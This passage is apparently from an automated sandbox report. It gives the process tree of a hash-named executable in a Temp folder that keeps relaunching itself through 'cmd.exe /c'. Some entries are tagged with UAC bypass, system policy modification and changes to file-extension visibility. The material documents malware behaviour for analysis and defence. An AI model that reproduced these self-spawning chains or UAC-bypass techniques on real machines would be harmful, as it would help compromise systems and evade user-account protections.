        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        45⤵
        
        PID:820
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        46⤵
        
        PID:220
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        47⤵
        
        PID:3764
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        48⤵
        
        PID:3968
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        49⤵
        Modifies visibility of file extensions in Explorer
        
        PID:2568
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        50⤵
        
        PID:3524
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        51⤵
        
        PID:2204
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        52⤵
        
        PID:4888
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        53⤵
        
        PID:5080
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        54⤵
        
        PID:2872
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        55⤵
        Modifies visibility of file extensions in Explorer
        
        PID:736
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        55⤵
        Modifies visibility of file extensions in Explorer
        
        PID:4000
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        56⤵
        
        PID:4316
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        57⤵
        
        PID:3924
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        58⤵
        
        PID:4508
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        59⤵
        
        PID:2732
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        60⤵
        
        PID:4516
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        61⤵
        
        PID:1908
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        62⤵
        
        PID:4700
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        63⤵
        
        PID:4500
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        64⤵
        
        PID:3848
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        65⤵
        
        PID:4948
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        66⤵
        
        PID:3544
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        67⤵
        
        PID:2660
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        68⤵
        
        PID:1500
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        69⤵
        
        PID:1208
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        70⤵
        
        PID:220
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        71⤵
        
        PID:4680
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        72⤵
        
        PID:1908
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        73⤵
        
        PID:1904
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        74⤵
        
        PID:404
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        75⤵
        
        PID:4980
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        76⤵
        
        PID:2936
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        77⤵
        
        PID:1564
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        78⤵
        Checks whether UAC is enabled
        System policy modification
        
        PID:4896
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        79⤵
        
        PID:4048
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        80⤵
        
        PID:1492
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        81⤵
        
        PID:5040
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        81⤵
        
        PID:2204
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        82⤵
        
        PID:4464
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        83⤵
        
        PID:1672
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        84⤵
        
        PID:1596
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        85⤵
        
        PID:5020
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        86⤵
        
        PID:4652
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        87⤵
        
        PID:3492
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        88⤵
        
        PID:1140
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        89⤵
        
        PID:2568
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        90⤵
        
        PID:4804
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        91⤵
        
        PID:1032
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        92⤵
        
        PID:3676
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        93⤵
        
        PID:2100
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        94⤵
        
        PID:4156
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        95⤵
        
        PID:4044
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        96⤵
        
        PID:4320
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        97⤵
        
        PID:4460
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        98⤵
        
        PID:2816
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        99⤵
        
        PID:644
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        100⤵
        
        PID:3756
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        101⤵
        Checks whether UAC is enabled
        System policy modification
        
        PID:3580
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        102⤵
        
        PID:4400
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        103⤵
        
        PID:1716
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        104⤵
        
        PID:4108
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        105⤵
        
        PID:3340
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        106⤵
        
        PID:2556
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        107⤵
        
        PID:1580
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        108⤵
        
        PID:4652
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        109⤵
        
        PID:4428
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        110⤵
        
        PID:696
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        111⤵
        
        PID:4188
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        111⤵
        
        PID:772
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        112⤵
        
        PID:1044
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        113⤵
        
        PID:1372
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        113⤵
        
        PID:3976
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        114⤵
        
        PID:4440
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        115⤵
        
        PID:4648
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        116⤵
        
        PID:3732
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        117⤵
        
        PID:4420
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        118⤵
        
        PID:2964
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        119⤵
        
        PID:1028
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        120⤵
        
        PID:436
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        121⤵
        
        PID:772
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        122⤵
        
        PID:1652
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        123⤵
        
        PID:2120
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        124⤵
        
        PID:844
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        125⤵
        
        PID:4448
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        126⤵
        
        PID:4992
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        127⤵
        
        PID:1432
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        128⤵
        
        PID:3960
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        129⤵
        
        PID:2764
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        130⤵
        
        PID:4192
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        131⤵
        
        PID:3340
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        131⤵
        
        PID:2556
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        132⤵
        Checks whether UAC is enabled
        System policy modification
        
        PID:4396
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        133⤵
        
        PID:4504
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        134⤵
        
        PID:644
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        135⤵
        
        PID:2152
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        135⤵
        
        PID:2360
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        136⤵
        
        PID:2720
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        137⤵
        
        PID:4048
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        137⤵
        
        PID:4116
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        138⤵
        
        PID:3704
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        139⤵
        
        PID:1492
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        139⤵
        UAC bypass
        Checks whether UAC is enabled
        System policy modification
        
        PID:4776
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        140⤵
        
        PID:3388
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        141⤵
        
        PID:1496
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        142⤵
        
        PID:5032
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        143⤵
        
        PID:2296
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        143⤵
        
        PID:4100
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        144⤵
        
        PID:4480
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        145⤵
        
        PID:880
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        146⤵
        
        PID:1416
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        147⤵
        
        PID:488
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        148⤵
        
        PID:3116
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        149⤵
        
        PID:5028
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        150⤵
        
        PID:2660
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        151⤵
        
        PID:2556
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        152⤵
        
        PID:1028
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        153⤵
        
        PID:4912
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        154⤵
        
        PID:396
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        155⤵
        
        PID:2816
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        155⤵
        
        PID:4984
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        156⤵
        
        PID:3664
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        157⤵
        UAC bypass
        
        PID:3480
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        157⤵
        
        PID:4804
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        158⤵
        
        PID:752
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        159⤵
        UAC bypass
        Checks whether UAC is enabled
        System policy modification
        
        PID:4992
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        160⤵
        
        PID:3460
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        161⤵
        
        PID:4772
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        162⤵
        
        PID:2716
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        163⤵
        
        PID:4504
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        164⤵
        
        PID:3636
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        165⤵
        
        PID:1208
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        166⤵
        
        PID:4952
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        167⤵
        UAC bypass
        Checks whether UAC is enabled
        System policy modification
        
        PID:3388
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        168⤵
        
        PID:2704
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        169⤵
        
        PID:4464
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        170⤵
        
        PID:4516
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        171⤵
        
        PID:3960
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        172⤵
        UAC bypass
        Checks whether UAC is enabled
        System policy modification
        
        PID:2864
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        173⤵
        
        PID:980
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        174⤵
        
        PID:4484
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        175⤵
        
        PID:1332
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        175⤵
        
        PID:668
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        176⤵
        Modifies visibility of file extensions in Explorer
        
        PID:1108
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        177⤵
        
        PID:2420
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        178⤵
        
        PID:1248
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        179⤵
        
        PID:4988
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        180⤵
        
        PID:1920
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        181⤵
        
        PID:4580
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        182⤵
        
        PID:4784
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex
        183⤵
        
        PID:3300
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\9951030ee369c5exeexeexeex"
        184⤵
        
        PID:4644
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        185⤵
        
        PID:4912
        
